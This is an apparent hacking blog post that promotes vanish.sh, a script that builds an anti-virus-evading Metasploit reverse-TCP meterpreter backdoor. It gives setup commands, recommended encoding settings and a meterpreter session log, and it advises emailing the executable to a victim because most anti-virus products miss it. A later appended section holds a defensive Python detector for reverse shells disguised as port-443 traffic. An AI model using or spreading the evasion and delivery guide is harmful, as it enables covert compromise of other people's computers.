Security Labs launch an automated Anti-Virus and Firewall Bypass Script by team SecurityLabs and The Hacker News :D (Thanks to Astr0baby)
This is an article on how we can create a fully undetectable Metasploit payload.
This is a modified and stable version of the script, made to work with the BackTrack 5 distribution.
Code:
root@bt:/pentest/exploits/framework# chmod +x vanish.sh
root@bt:/pentest/exploits/framework# ./vanish.sh
************************************************************
Fully Undetectable Metasploit Payload generaor Beta
Original Concept and Script by Astr0baby
Stable Version of Script is Edited by Vanish3r
Video Tutorial by Vanish3r - www.securitylabs.in
Powered by TheHackerNews.com and securitylabs.in
************************************************************
# Runtimes
To compile the generated payload we need the Mingw32 gcc runtime package,
which you can install with:
Code:
root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
After the installation we must move our shell script, vanish.sh, to the default
Metasploit folder (/pentest/exploits/framework) and execute it:
Code:
root@bt:/pentest/exploits/framework# chmod +x vanish.sh
root@bt:/pentest/exploits/framework# sh vanish.sh
************************************************************
Fully Undetectable Metasploit Payload generaor Beta
Original Concept and Script by Astr0baby
Stable Version of Script is Edited by Vanish3r
Video Tutorial by Vanish3r - www.securitylabs.in
Powered by TheHackerNews.com and securitylabs.in
************************************************************
Network Device On your Computer :
lo:
eth2:
Which Interface to use ? eth2
What Port Number are we gonna listen to? : 443
Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 7000
How many times you want to encode ? 1-20 : 14
Current Ip is : 192.168.93.1
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 452 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 479 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 506 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 533 (iteration=9)
[*] x86/shikata_ga_nai succeeded with size 560 (iteration=10)
[*] x86/shikata_ga_nai succeeded with size 587 (iteration=11)
[*] x86/shikata_ga_nai succeeded with size 614 (iteration=12)
[*] x86/shikata_ga_nai succeeded with size 641 (iteration=13)
[*] x86/shikata_ga_nai succeeded with size 668 (iteration=14)
backdoor.exe ...generated in seclabs subfolder
backdoor.exe sha1checksum is .. 94da3a4888d8158c9dafa51e2d35528d99a1e871 backdoor.exe
starting the meterpreter listener...
vanish.sh will create a subfolder called "seclabs" and you will find your backdoor.exe there :)
# Recommended:
Seed number = 7000 and
Number of encodings = 14
# Sending to Victim:
You can easily send it by email, or any other way, as it is undetectable by most anti-virus products.
After execution on the victim, our Metasploit console shows the connection :))
Code:
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.200.22
LPORT => 443
[*] Started reverse handler on 192.168.93.1:443
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.93.2
[*] Meterpreter session 1 opened (192.168.93.1:443 -> 192.168.93.2:55865)
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
12 services.exe x86 0 NT AUTHORITY\INTERACTIVE C:\windows\system32\services.exe
17 explorer.exe x86 0 NT AUTHORITY\INTERACTIVE C:\windows\system32\explorer.exe
33 winedevice.exe x86 0 NT AUTHORITY\INTERACTIVE C:\windows\system32\winedevice.exe
8 24382.exe x86 0 NT AUTHORITY\INTERACTIVE Z:\pentest\exploits\framework\ShellCode\24382.exe
meterpreter > sysinfo
Computer : bt
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
# Note:
By default the script generates a reverse TCP payload, but you can change that with some modifications to the script [vanish.sh].
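A defender's view of the session above, as an added example (not code from the original post or from vanish.sh): the handler listens on 443, but windows/meterpreter/reverse_tcp is plain TCP, so the flow does not open with a TLS ClientHello and the server side sends the stage first. The flow tuples, the size window and the 4-byte length prefix on the stage are assumptions made for illustration.

```python
import struct

def is_tls_client_hello(data: bytes) -> bool:
    """A TLS session starts with a client-sent handshake record (type 0x16,
    version 3.x) whose first handshake message is ClientHello (0x01)."""
    return (len(data) >= 6 and data[0] == 0x16 and data[1] == 0x03
            and data[2] <= 0x04 and data[5] == 0x01)

def classify_443_flow(first_sender: str, first_payload: bytes):
    """Classify a TCP flow to port 443 by its first data segment.

    first_sender: "client" (host that opened the connection) or "server".
    Returns (verdict, detail)."""
    if first_sender == "client":
        if is_tls_client_hello(first_payload):
            return ("tls", None)
        return ("suspicious", "client data on 443 is not a TLS ClientHello")
    # In TLS the server never sends application data before the ClientHello.
    detail = "server sent data before any ClientHello"
    # Assumption: the staged handler prefixes the stage with a 4-byte
    # little-endian length. The size window is a constructed threshold.
    if len(first_payload) >= 4:
        (announced,) = struct.unpack("<I", first_payload[:4])
        if 100_000 <= announced <= 5_000_000:
            detail += f"; length prefix announces {announced} bytes"
    return ("suspicious", detail)

# Constructed sample flows (not captured traffic): (name, first sender, first bytes)
SAMPLE_FLOWS = [
    ("browser", "client", bytes.fromhex("16030100c8010000c40303")),
    ("plain-http", "client", b"GET / HTTP/1.1\r\n"),
    ("stage-push", "server", struct.pack("<I", 752128) + b"\x00" * 16),
]

def triage(flows):
    """Return {name: detail} for every flow that is not ordinary TLS."""
    flagged = {}
    for name, sender, payload in flows:
        verdict, detail = classify_443_flow(sender, payload)
        if verdict != "tls":
            flagged[name] = detail
    return flagged

if __name__ == "__main__":
    for name, detail in triage(SAMPLE_FLOWS).items():
        print(f"{name}: {detail}")
```

Feed it the first data segment of each port-443 flow from a sensor or packet capture; a TLS-inspecting proxy that refuses non-TLS traffic on 443 enforces the same rule inline.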
--------------------------------------------------------------------------------------------------------------------------
Proof Of Concept - Virus Scan Report of Backdoor :
------------------------------
# Get Vanish.sh
Download Link of Vanish.sh : Click Here